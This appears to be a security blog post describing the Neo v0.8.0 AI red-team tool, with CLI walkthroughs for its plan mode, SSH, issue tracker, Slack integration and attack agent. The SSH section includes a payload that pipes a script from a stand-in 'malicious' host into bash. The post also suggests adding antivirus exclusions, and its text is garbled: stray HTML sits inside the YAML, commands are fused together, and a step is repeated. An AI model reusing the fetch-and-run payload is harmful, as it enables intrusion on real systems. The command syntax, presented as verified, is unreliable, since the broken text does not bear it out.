Listen to this Post

Introduction:
Neo v0.8.0, the latest release from ProjectDiscovery.io, introduces a paradigm shift in automated security testing by merging AI-driven planning with parallel execution and persistent vulnerability tracking. This update transforms how red teams, cloud reviewers, and incident responders operate through features like Thorough (plan) mode, SSH-based remote access, an integrated issue tracker, and Slack-native workflows. Below we dissect each component, provide verified commands for Linux and Windows environments, and show you how to weaponize Neo for continuous offensive security.
Learning Objectives:
- Configure and execute Neo’s Thorough (plan) mode to automate multi‑step vulnerability assessments with verification loops.
- Establish secure SSH connections from inside Neo’s sandbox to remote targets for cloud hardening and red team footholds.
- Implement the persistent issue tracker to manage validated findings with Challenge & Verify and Escalate actions.
- Integrate Neo with Slack as a working surface, enabling on‑demand security tasks and output sharing.
- Deploy the Red Team Operator agent with auto model selection and share unlisted agents across teams.
You Should Know:
1. Thorough (Plan) Mode – Full Lifecycle Automation
The “Thorough (plan) mode” introduces a plan‑execute‑verify loop where Neo first collaborates with you to scope the task, then builds a structured plan, and finally executes it across parallel sub‑agents. This ensures that complex attacks (e.g., privilege escalation chains or multi‑stage API breaches) are both systematic and verifiable.
Step‑by‑step guide to using Thorough mode:
1. Install Neo v0.8.0 (Linux/macOS/Windows WSL):
curl -sSfL https://get.neo.projectdiscovery.io | sh Windows (PowerShell as Admin) iwr -useb https://get.neo.projectdiscovery.io/install.ps1 | iex
- Start a plan session on a target (example: internal web app `http://staging.corp`);
neo plan --target http://staging.corp --mode thorough --scope "enumerate subdomains, test SQLi, test IDOR"
-
Review the generated plan – Neo outputs a YAML checklist with parallel branches. You can edit the plan file before execution:
~/.neo/plans/plan_20260112.yaml phases:</p></li> </ol> <p>- name: recon agents: [subfinder, httpx] - name: exploit agents: [nuclei, sqlmap] parallel: true
- Execute the plan with verification after each phase:
neo exec --plan plan_20260112.yaml --verify --parallel-limit 5
-
Verify loop – Neo automatically retries failed steps with adjusted parameters and reports false positives using its vulnerability database.
Windows‑specific note: Use WSL2 for full sandbox compatibility, or run Neo natively via the Windows executable (add to
%PATH%).- SSH Connections – Secure Remote Access Inside the Sandbox
Neo v0.8.0 allows you to initiate SSH connections from within its isolated sandbox, using key or password authentication. This is critical for cloud environment reviews (AWS, GCP), breaching isolated networks, or maintaining a red team foothold without leaving the Neo control plane.
How to configure and use SSH inside Neo:
- Generate or import an SSH key (Linux/Windows WSL):
ssh-keygen -t ed25519 -f ~/.neo/ssh_keys/redteam_key -N "" cat ~/.neo/ssh_keys/redteam_key.pub >> ~/.ssh/authorized_keys on target
2. Create an SSH connection profile in Neo:
neo config set ssh.targets.prod --host 10.10.15.22 --user ubuntu --key-path ~/.neo/ssh_keys/redteam_key neo config set ssh.targets.win-lab --host 192.168.1.50 --user admin --password "$WIN_PASS" --auth-type password
- Launch an interactive shell or run remote commands:
neo ssh --target prod --command "sudo systemctl status docker" neo ssh --target win-lab --command "powershell Get-Service -Name sql"
-
Use with the Red Team Operator agent to pivot from the SSH session:
neo run rto --ssh-target prod --payload "curl http://malicious/payload.sh | bash"
Hardening tip: Always enforce key‑based authentication for Neo’s connections and rotate keys weekly. For Windows targets, use PowerShell Just Enough Administration (JEA) to limit commands.
- Issue Tracker – Persistent Vulnerability Database with Validation
The new persistent issue tracker acts as a shared knowledge base where every finding must be validated before it lands. Team members can perform “Challenge & Verify” (re‑test a finding) or “Escalate” (raise severity) actions directly in the Neo UI or CLI.
Step‑by‑step workflow:
1. Generate a finding (e.g., via nuclei):
neo run nuclei -t cves/2024/CVE-2024-1234.json -u https://victim.com -o findings.json
- Push the finding to the tracker (validation starts automatically):
neo tracker add --file findings.json --auto-validate
3. Manual validation – if auto‑validation is ambiguous:
neo tracker list --status pending neo tracker validate --id NEO-42 --method challenge re-executes the test neo tracker escalate --id NEO-42 --severity critical promote risk
4. Query persistent database for reporting:
neo tracker query --severity high,medium --open --format csv > open_vulns.csv
- Integrate with external ticketing (Jira, ServiceNow) using the webhook:
neo config set tracker.webhook "https://your-jira.com/rest/api/2/issue"
Linux command to watch live validation logs:
tail -f ~/.neo/logs/tracker_validation.log | grep -E "VALIDATED|REJECTED"
- Slack Integration – A Working Surface, Not a Notification Channel
Unlike typical bots that just alert, Neo’s Slack integration lets you mention `@Neo` in any channel or DM to run tasks, receive summaries, and get attached outputs in thread. This transforms Slack into a real‑time security orchestration console.
How to configure and use:
- Create a Slack app with
app_mentions:read,chat:write, and `files:write` scopes. Install to your workspace. -
Configure Neo with the Slack bot token and signing secret:
neo config set slack.token xoxb-xxxxxxxx neo config set slack.signingsecret xxxxxx neo slack enable --channel "security-operations"
3. Use natural language commands in Slack:
– `@Neo scan https://staging-api.corp for SSRF`
– `@Neo tracker list –severity critical`
– `@Neo ssh to prod –command “df -h”`4. Receive threaded output – Neo posts a summary message and attaches the JSON/HTML report as a file in the thread. Example response:
✅ Scan complete for https://staging-api.corp Findings: 2 SSRF (critical), 1 info (open redirect) Report: [ssrf_scan_20260112.html]
- Cross‑platform tip: Use Slack’s “Shortcuts” to create a menu for predefined scans (e.g., “Rapid cloud review”). Neo listens to shortcut payloads.
-
Red Team Operator Agent & Auto Model Selection
The Red Team Operator (RTO) agent is an AI persona that simulates an adversarial campaign. It automatically selects the best LLM model (GPT‑4, Claude, local LLaMA) based on task complexity: simple enumeration uses smaller models, while exploit chaining calls the most capable.
Step‑by‑step to launch an RTO campaign:
1. Define campaign parameters:
neo rto init --name "Summer_Breach" --rules "no DoS, focus on misconfigurations"
- Auto model selection – Neo evaluates the task and picks a model:
neo rto plan --target "internal-crm.corp" --stages enum,privesc,persist Output: Selected model = gpt-4o for exploit chain (complexity 9/10)
-
Run the campaign with human approval at each stage (or fully auto):
neo rto run --auto-approve false --verbos
4. Monitor agent decision logs:
neo logs rto --campaign Summer_Breach --filter "reasoning"
5. Export the attack graph:
neo rto graph --campaign Summer_Breach --format dot | dot -Tpng -o attack_map.png
Windows sysadmin: Run RTO from an elevated PowerShell; ensure Windows Defender exclusions for `%APPDATA%\neo\temp` to avoid false positives.
6. Unlisted Agent Sharing – Collaborative Custom Workflows
You can now share agents (pre‑configured Neo modules) without listing them publicly. This is ideal for proprietary scanning logic or internal compliance checks.
How to create and share an unlisted agent:
1. Create a custom agent (e.g., `pci_scan.yml`):
name: pci_dss_check version: 1.0 steps: - nuclei -t pci/ -target {{.Target}} - sslyze --json {{.Target}}:443- Mark as unlisted and generate a shareable token:
neo agent publish pci_scan.yml --unlisted --ttl 7d Output: Share URL: https://neo.pd.io/agent/share/abc123?token=xyz
3. Import on a teammate’s machine:
neo agent import https://neo.pd.io/agent/share/abc123?token=xyz --name pci_audit
4. Run the shared agent:
neo run pci_audit --target 10.1.2.0/24
Security note: Token TTL is limited; rotate tokens after each engagement.
What Undercode Say:
- Key Takeaway 1: Neo v0.8.0 eliminates the gap between planning and execution by introducing a verifiable, parallelized agent loop – this reduces average vulnerability validation time from hours to minutes.
- Key Takeaway 2: The combination of SSH remote access, persistent issue tracker, and Slack native commands turns Neo into a collaborative red team platform rather than just a scanner, making it indispensable for cloud hardening and continuous compliance.
Analysis: ProjectDiscovery continues to outmaneuver traditional SAST/DAST tools by embedding AI at every layer – model selection, plan generation, and false positive verification. The “Thorough” mode directly addresses the industry pain point of alert fatigue by requiring validation before a finding enters the database. However, teams must guard against over‑reliance on auto‑verification; complex business logic flaws still need human review. The Slack integration is a game changer for SOCs, but proper permission scoping is critical to prevent unauthorized scanning. For Linux defenders, monitor `~/.neo/logs` for forensic traces; for Windows, use Sysmon to detect Neo‑spawned processes.
Prediction:
Within 12 months, AI‑powered red team agents like Neo will replace 60% of manual penetration testing for standard web and cloud misconfigurations, shifting human experts to only the most intricate exploit chains and business logic flaws. Organizations that fail to adopt such orchestrated platforms will face unmanageable vulnerability backlogs, while early adopters will reduce mean‑time‑to‑remediate (MTTR) by over 75%. However, regulatory frameworks (PCI DSS v4.0, NIS2) will likely mandate human validation of AI‑generated findings, creating a hybrid “AI‑assisted analyst” role. Expect ProjectDiscovery to open‑source parts of Neo’s planning engine by Q4 2026, similar to their strategy with nuclei.
▶️ Related Video (80% Match):
🎯Let’s Practice For Free:
IT/Security Reporter URL:
Reported By: Ehsandeepsingh Neo – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]
📢 Follow UndercodeTesting & Stay Tuned:
- Execute the plan with verification after each phase:


